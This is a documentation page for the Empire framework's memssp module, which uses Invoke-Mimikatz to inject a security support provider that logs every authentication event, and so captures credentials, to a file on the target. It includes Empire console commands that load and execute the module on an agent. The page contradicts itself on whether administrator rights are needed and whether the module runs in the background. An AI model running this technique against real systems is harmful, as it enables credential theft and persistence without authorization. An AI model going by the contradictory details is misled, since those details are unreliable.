Invoke-Mimikatz memssp - Empire Module


This page contains detailed information about how to use the powershell/persistence/misc/memssp Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Invoke-Mimikatz memssp
Module: powershell/persistence/misc/memssp
Source code [1]: empire/server/modules/powershell/persistence/misc/memssp.yaml
Source code [2]: empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1
MITRE ATT&CK: T1101, S0194
Language: PowerShell
Needs admin: Yes
OPSEC safe: No
Background: Yes

The memssp module runs PowerSploit's Invoke-Mimikatz function to execute misc::memssp to log all authentication events to C:\Windows\System32\mimisla.log.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the memssp module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options


This is a list of options that are required by the memssp module:

Agent
Agent to run module on.

Memssp Example Usage


Here's an example of how to use the memssp module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/persistence/misc/memssp

 Author       @JosephBialek                                                          
              @gentilkiwi                                                            
 Background   True                                                                   
 Comments     http://clymb3r.wordpress.com/                                          
              http://blog.gentilkiwi.com                                             
 Description  Runs PowerSploit's Invoke-Mimikatz function to execute misc::memssp to 
              log all authentication events to C:\Windows\System32\mimisla.log.      
 Language     powershell                                                             
 Name         powershell/persistence/misc/memssp                                     
 NeedsAdmin   True                                                                   
 OpsecSafe    False                                                                  
 Software     http://attack.mitre.org/software/S0194                                 
 Techniques   http://attack.mitre.org/techniques/T1101                               


,Record Options-,----------,-------------------------,
| Name  | Value | Required | Description             |
|-------|-------|----------|-------------------------|
| Agent |       | True     | Agent to run module on. |
'-------'-------'----------'-------------------------'

(Empire: usemodule/powershell/persistence/misc/memssp) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/persistence/misc/memssp) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Authors


References


See Also


Check also the following modules related to this module:

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.